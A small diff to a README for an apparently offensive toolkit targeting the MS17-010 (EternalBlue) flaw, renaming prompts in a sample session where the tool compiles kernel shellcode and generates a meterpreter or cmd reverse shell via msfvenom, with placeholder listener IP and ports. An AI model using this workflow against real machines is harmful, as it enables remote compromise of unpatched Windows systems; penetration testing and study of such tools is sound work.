3ndG4me/AutoBlue-MS17-010/README.md

 Compiling x86 kernel shellcode kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom?
 (Y/n) y
-IP for reverse connection:
+LHOST for reverse connection:
 <YOUR-IP>
-PORT you want x64 to listen on:
+LPORT you want x64 to listen on:
 <SOME PORT>
-PORT you want x86 to listen on:
+LPORT you want x86 to listen on:
 <SOME OTHER PORT>
 Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell 0